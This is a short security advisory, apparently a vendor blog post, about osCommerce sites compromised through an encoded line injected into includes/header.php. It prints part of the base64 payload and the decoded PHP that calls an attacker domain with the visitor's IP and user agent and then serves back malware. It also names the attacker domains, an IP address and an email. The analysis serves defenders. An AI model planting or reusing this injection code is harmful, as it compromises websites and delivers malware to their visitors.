Quick malware update: We are seeing many osCommerce sites infected with malware managed by inininininininin.in, comcomcomcomcomcom.com and a few others. All the domains involved are hosted at 91.204.48.45.
These domains were registered by myid37@gmail.com, which is also involved on other malicious activities (serials-keys.com, wincrack.org, search-crack.org,etc).
The infected sites had a large encoded entry added to the file includes/header.php:
echo(base64_decode(“ZnVuY3Rpb24gczM3KCRzKXtmb3IgKCRhID0gMDsgJGEgPD…
Which when decoded, calls http://inininininininin.in/in.php to get what malware to present to the end user:
$url = @file_get_contents($h37.”:”.”//”.$c37.$c37.$c37.$c37.$c37.$c37.$c37.$c37.”.
$c37/”.$c37.”.ph”.”p?”.”i=”.$_SERVER[“REMOTE_ADDR”].”&b=”.urlencode($ua3).”&h=”.
urlencode($_SERVER[“HTTP_HOST”]));if (strstr($url,”!go!”)){$url = explode(“!go!”,$url); $url =
$url[1];echo $url;}
Some details here as well: http://sucuri.net/malware/entry/MW:JS:431
Having issues with malware? Sign up at http://sucuri.net and we will get it all sorted out.
